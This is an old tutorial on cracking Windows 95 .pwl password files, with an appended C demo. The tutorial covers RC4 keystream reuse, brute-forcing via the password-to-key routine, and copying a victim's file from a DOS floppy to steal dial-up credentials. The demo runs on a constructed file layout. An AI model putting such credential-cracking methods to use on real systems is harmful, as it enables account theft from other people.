A look inside the WIN95 password file
======================================================================
Author: Su Junming, feel free to redistribute
sjmisbesthacker
======================================================================
Basically, if other people have used your computer, it is quite likely that your password
(that is, your dial-up UserName & Password) has already been taken. All they need to do is
copy the .pwl file out of the Win95 directory; it can be decoded, and afterwards your
network bill may inexplicably go up.
Someone asks: but my Win95 asks for a password at login, and they don't know my password!
You have to understand that getting the .pwl file does not require logging in to Win95 at
all: boot from a DOS floppy, or press F4 or F8 during startup, and copy it from there.
There is a program on the Internet called glide.exe which claims it can crack .pwl files.
It really can, but it has some inherent limitations, so in most cases only a small part of
the file is recovered. I believe some people have tried it. I will explain how it works and
why, most of the time, only a small part can be recovered. Fortunately, that "small part"
already includes the first complete set of UserName & Password.
Win95 encrypts the file with RC4. The algorithm is not reversible: you cannot recover the
original data from the .pwl file unless you have the key (or use brute force). Let me sketch
roughly how RC4 runs:

You have a 32-bit key and the data to process (call it SDATA).
The decoding routine does the following:
1. Initialize a table. Its data structure is

       struct {
           unsigned char Table[256];
           unsigned char x, y;
       };

   Table is filled with 0, 1, 2, ..., FFh, and x and y are set to 00.
2. Take these 256 bytes and do a series of SWAPs according to the Key. When that is
   done, the Table looks thoroughly shuffled.
   Everything up to here is [initialization].
Then comes the decoding action:
3.
       for (counter = 0; counter < length; counter++) {
           x = (x + 1) % 256;
           y = (Table[x] + y) % 256;
           swap(&Table[x], &Table[y]);
           xor_index = (Table[x] + Table[y]) % 256;
           SDATA[counter] ^= Table[xor_index];
       }

   So during decoding not only x and y change; the contents of Table keep changing too.

**** The key point ****
Suppose SDATA is 100 bytes. If I want to decrypt 20 bytes, the process is 1 -> 2 -> 3.
Then I check whether those 20 bytes are the right information; if they are, I decrypt
the remaining 80 bytes with the process 2 -> 3. If the data is split into several pieces,
the process should still look like this:

       1 -> 2 -> 3   decrypt the first 20 bytes
       2 -> 3        decrypt the next 20 bytes
       2 -> 3        decrypt the next 20 bytes
       2 -> 3        decrypt the next 20 bytes
       2 -> 3        decrypt the next 20 bytes

Whatever happens, the first piece starts with step 1!!! :)
The effect is that every piece is XORed against a keystream that starts over from the
beginning, so one piece whose plaintext you know gives away the keystream used at the
start of every other piece.
======================================================================
The PWL format (starting from 0208h) is:

       20 bytes  (username)
        2 bytes  (offset of the first group in the file)  ------+
        2 bytes  (offset of the second group in the file) ----+ |
            .......                                           | |
                                                              | |
       TAG1: length (2 bytes), "Connected to" name, password <+-+
             length (2 bytes), "Connected to" name, password <+
======================================================================
Win95 roughly does this:

       1 -> 2 -> 3  decode up to TAG1 - 1 (the UserName is in this part)
       if (decoded UserName <> the UserName typed at the Win95 logon) {
           the password field of Dial-Up Networking is left empty (even if
           "save password" was checked)
           (jumping to Step1 would be pointless: the Key is wrong, so the
           decryption would be wrong too)
       } else {
       Step1:
           1 -> 2 -> 3  starting from TAG1
           while (not at the end) {
               2 -> 3  decode 2 bytes (the length, call it yy)
               2 -> 3  decode yy bytes (the "Connected to" name & password)
               if (the name matches the "Connected to" name) {
                   fill the password into the password field;
                   break;
               }
           }
       }

Win95's problem is that it converts the Username to upper case and pads anything shorter
than 20 bytes with spaces. Worse, the PWL file begins with the UserName. From this we know
exactly what each of those 20 bytes was XORed with; suppose they were:

       12 4F 33 20 7F F6 D9 3C 63 AA 11 40 32 DE 46 55 77 2C 3A AD

Actually, how many groups of accounts there are can also be worked out from the PWL. From
what? I have forgotten. Anyway, it can be! So 0108h + (number of groups) * 2 = TAG1
(0108h is fixed). Ha, now I know where the first group of accounts is. Knowing the position
of the first group, I also know the 2 bytes right after the username (the offset of the first
group). Now we have 22 bytes!
How do we decrypt the first group? Because Win95 restarts the cipher at Step1 (1 -> 2 -> 3),
we can simply try our luck: XOR those 22 bytes against the data starting at TAG1. If the
"Connected to" name plus the password is not too long ----> it is revealed completely,
nothing left over (you may even see a little of the second group!).
That is the principle glide.exe uses (no key at all; the key is bypassed). But if you want
all of your accounts (Hinet, SeedNet, the big BBSes... with so many accounts, is one
borrowed set enough?), sorry, you have to know the KEY.
Where does the KEY come from? When we enter Win95, there is a dialog asking for a password,
right? Yes, it is that password, transformed!
(If you did not set a password, your key = 00000000h.)
The following is the routine Win95 uses to turn the password into the Key (EAX at the end is
your key):

           PUSH  ESI
           XOR   EAX, EAX
           MOV   SI, password length + 1
           CMP   SI, AX
           JZ    7FCB19E7
           MOV   EDX, OFFSET password
           MOVZX ECX, BYTE PTR [EDX]
       7FCB19D1:
           ADD   EAX, ECX
           INC   EDX
           MOV   ECX, EAX
           SHL   ECX, 7
           SHR   EAX, 19H
           OR    ECX, EAX
           DEC   SI
           MOV   EAX, ECX
           JNZ   7FCB19D1
       7FCB19E7:
           POP   ESI
           RET   8

The assembly is a bit messy; in C it looks like this (same result; unsigned long is 32 bits
on Win95):

       unsigned long result = 0L;
       for (i = 0; i < strlen(password); i++) {
           result += toupper(password[i]);
           int tmp = (int)(result >> 25);     /* the 7 high bits, as SHR EAX, 19H above */
           result = (result << 7) | tmp;      /* rotate left by 7 */
       }

Nothing but rotating and adding! So if you know someone's Win95 password, you can compute
the key and get every account that person has used. How? You don't even have to write a
program; just use SoftICE. All the action happens in MSPWL32.DLL: set a breakpoint, step
through, convenient and easy. If you don't know the person's Win95 password either, use
brute force:

   1. Guess a password -> convert it to the key -> RC4 -> what! the first 20 bytes are
      not the UserName -> back to the start and try again
   2. Pick a key directly -> RC4 -> what! the first 20 bytes are not the UserName -> back
      to the start and try again

Either way, it depends on your luck. :)
Glide.exe seems to be on YHQ, I don't know..... forgot????????
Note: Microsoft later released an update for MSPWL32.DLL for these bugs; I heard it solves
the problem. I have not tried it, so I don't know. Look at the first 4 bytes of your .pwl
file: if they are B0h, "MFN", you are in danger!!!
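The following C program is an added example; it is not code from this article, from
glide.exe or from MSPWL32.DLL. It implements the three RC4 steps and the rotate-and-add
password-to-key routine as the article gives them, then runs both attacks described above on
a constructed file: the keystream-reuse trick (no key needed) and the password-guessing loop
(key needed). Assumptions, all mine: the 32-bit key is fed to RC4 as four little-endian
bytes; every chunk restarts the cipher from its initial state (steps 1 and 2 rerun), which is
the reuse the attack relies on; the layout [20-byte name | 2-byte offset] [2-byte length]
[resource NUL password] is a stand-in for the article's description, not the real .pwl
on-disk format; the user name, resource, passwords and guesses are made up.

```c
/* Added example (not from the article, glide.exe or MSPWL32.DLL): RC4 steps 1-3 as
 * described above, the rotate-and-add key routine, the keystream-reuse attack (no key)
 * and password guessing (key). Layout and names are constructed for illustration. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define NAME_LEN 20             /* user name field: upper-cased, space padded */
#define TAG1 (NAME_LEN + 2)     /* one group: name + one 2-byte offset */
typedef struct { unsigned char table[256]; unsigned char x, y; } rc4_state;
static void swap_bytes(unsigned char *a, unsigned char *b) { unsigned char t = *a; *a = *b; *b = t; }
static void rc4_step1(rc4_state *s) {          /* Step 1: Table = 0..FFh, x = y = 0 */
    for (int i = 0; i < 256; i++) s->table[i] = (unsigned char)i;
    s->x = s->y = 0;
}
static void rc4_step2(rc4_state *s, const unsigned char *key, size_t keylen) {  /* Step 2 */
    unsigned char j = 0;
    for (int i = 0; i < 256; i++) {             /* swap Table entries according to the key */
        j = (unsigned char)(j + s->table[i] + key[i % keylen]);
        swap_bytes(&s->table[i], &s->table[j]);
    }
}
static void rc4_step3(rc4_state *s, unsigned char *sdata, size_t len) {  /* Step 3 */
    for (size_t i = 0; i < len; i++) {          /* x, y and Table all change as we go */
        s->x = (unsigned char)(s->x + 1);
        s->y = (unsigned char)(s->table[s->x] + s->y);
        swap_bytes(&s->table[s->x], &s->table[s->y]);
        sdata[i] ^= s->table[(unsigned char)(s->table[s->x] + s->table[s->y])];
    }
}
/* Password -> 32-bit key as the article gives it: add the upper-cased byte, rotate left 7. */
static uint32_t pwl_key(const char *password) {
    uint32_t key = 0;
    for (; *password; password++) {
        key += (unsigned char)toupper((unsigned char)*password);
        key = (key << 7) | (key >> 25);
    }
    return key;
}
/* One chunk with the cipher restarted from scratch (assumed: steps 1 and 2 rerun,
 * key fed as 4 little-endian bytes). Restarting per chunk is the flaw. */
static void crypt_chunk(unsigned char *chunk, size_t len, uint32_t key) {
    unsigned char kb[4] = { (unsigned char)key, (unsigned char)(key >> 8),
                            (unsigned char)(key >> 16), (unsigned char)(key >> 24) };
    rc4_state s; rc4_step1(&s); rc4_step2(&s, kb, sizeof kb); rc4_step3(&s, chunk, len);
}
/* What Win95 stores for the name: upper case, space padded to 20 bytes. */
static void name_field(unsigned char *out, const char *user) {
    memset(out, ' ', NAME_LEN);
    for (size_t i = 0; user[i] && i < NAME_LEN; i++) out[i] = (unsigned char)toupper((unsigned char)user[i]);
}
/* Constructed region: [name(20) | offset(2)] [len(2)] [resource NUL password],
 * each bracket encrypted as its own chunk. Returns the total length. */
static size_t build_region(unsigned char *out, const char *user, const char *resource,
                           const char *password, uint32_t key) {
    size_t rlen = strlen(resource), plen = strlen(password), body = rlen + 1 + plen;
    name_field(out, user);
    out[NAME_LEN] = TAG1 & 0xFF; out[NAME_LEN + 1] = TAG1 >> 8;
    crypt_chunk(out, TAG1, key);
    out[TAG1] = (unsigned char)body; out[TAG1 + 1] = (unsigned char)(body >> 8);
    crypt_chunk(out + TAG1, 2, key);
    memcpy(out + TAG1 + 2, resource, rlen);
    out[TAG1 + 2 + rlen] = 0;
    memcpy(out + TAG1 + 3 + rlen, password, plen);
    crypt_chunk(out + TAG1 + 2, body, key);
    return TAG1 + 2 + body;
}
/* glide-style attack: 22 bytes of known plaintext give 22 keystream bytes, which also
 * decrypt the length field and the first 22 body bytes. Returns bytes recovered. */
static size_t keystream_attack(const unsigned char *region, const char *user,
                               unsigned char *body_out, size_t *len_out) {
    unsigned char ks[TAG1];
    name_field(ks, user);
    ks[NAME_LEN] = TAG1 & 0xFF; ks[NAME_LEN + 1] = TAG1 >> 8;
    for (size_t i = 0; i < TAG1; i++) ks[i] ^= region[i];   /* ciphertext ^ known = keystream */
    *len_out = (size_t)(region[TAG1] ^ ks[0]) | (size_t)(region[TAG1 + 1] ^ ks[1]) << 8;
    size_t n = *len_out < TAG1 ? *len_out : TAG1;            /* keystream known only this far */
    for (size_t i = 0; i < n; i++) body_out[i] = region[TAG1 + 2 + i] ^ ks[i];
    return n;
}
/* Brute force: guess -> key -> RC4; the right guess turns the first 20 bytes into the name. */
static int guess_password(const unsigned char *region, const char *user,
                          const char *const *guesses, size_t n) {
    unsigned char expect[NAME_LEN], trial[NAME_LEN];
    name_field(expect, user);
    for (size_t i = 0; i < n; i++) {
        memcpy(trial, region, NAME_LEN);
        crypt_chunk(trial, NAME_LEN, pwl_key(guesses[i]));
        if (memcmp(trial, expect, NAME_LEN) == 0) return (int)i;
    }
    return -1;
}
/* Both attacks on a constructed file: returns the index of the right guess, or -1 if
 * the keyless attack did not first recover the group "Hinet\0secret". */
static int run_demo(void) {
    static const char *const guesses[] = { "hello", "12345", "Sjm95" };
    unsigned char region[64], body[TAG1];
    size_t len, n;
    build_region(region, "sjm", "Hinet", "secret", pwl_key("Sjm95"));
    n = keystream_attack(region, "sjm", body, &len);
    if (n != 12 || len != 12 || memcmp(body, "Hinet\0secret", 12) != 0) return -1;
    return guess_password(region, "sjm", guesses, 3);
}
int main(void) { printf("keyless attack ok, right guess is index %d\n", run_demo()); return 0; }
```

keystream_attack never touches the key: the 20-byte name plus the 2-byte offset are the
known plaintext, and because every chunk starts from the same cipher state, the 22 keystream
bytes they expose decrypt the length word and the first 22 bytes of the group body, exactly
the "small part" glide.exe gets. Anything past byte 22 of a group needs the key, which is
what guess_password recovers by checking each candidate against the name field.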